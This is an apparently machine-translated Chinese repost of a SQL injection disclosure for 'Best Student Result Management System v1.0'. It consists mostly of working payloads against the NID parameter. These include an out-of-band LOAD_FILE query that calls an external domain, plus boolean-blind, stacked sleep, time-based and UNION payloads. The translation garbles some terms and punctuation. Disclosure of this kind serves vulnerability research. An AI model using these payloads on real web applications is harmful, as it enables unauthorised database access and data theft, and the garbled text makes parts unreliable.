最佳学生结果管理系统v1.0-多个SQLI

HackApt-37 Team · 04 9, 2025

## title:最佳学生结果管理系统v1.0-多个SQLI
##作者: nu11secur1ty
## Date: 04/08/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/...ode-php-php-php-and-mysql-mysql-free-download
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
NID参数似乎很容易受到SQL注入攻击的影响。
有效载荷'+（选择
load_file（'\\\\ qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com \\ tuh'））+'
在NID参数中提交。此有效载荷注入SQL
使用UNC文件路径调用MySQL的LOAD_FILE函数的子查询
这引用了外部域上的URL。应用程序
与该域进行交互，表明注射的SQL查询
被执行。
攻击者可以使用此信息从系统中获取所有信息
脆弱性！
状态:高脆弱性
[+]有效载荷:
``MySQL
---
参数: NID（GET）
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload: nid=1454488807'或'1766'='1766'和2997=2997和'ibfu'='ibfu
type:堆叠查询
title: mysql=5.0.12堆叠查询（注释）
payload: nid=145448807'或'1766'='1766';选择睡眠（7）＃
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人（查询睡眠）
payload: nid=1454488807'或'1766'='1766'和（从中选择3474
（Select（Sleep（7）））EADM）和'ubzr'='ubzr
type:联合查询
title: mysql联合查询（null）-4列
payload: nid=145448807'或'1766'='1766'联盟全部选择
NULL，NULL，CONCAT（0x716A767871,0x76504A4A4F6455624669506C6A4841507277 67554E66574D7856554875684368426B4F72794374496E，0x716B787071），null＃
---
````````

H	人力资源管理系统v1.0-多个SQLI HackApt-37 Team 04 9, 2025 POC/?Day
H	Vaidya -Mitra 1.0-多个SQLI HackApt-37 Team 04 9, 2025 POC/?Day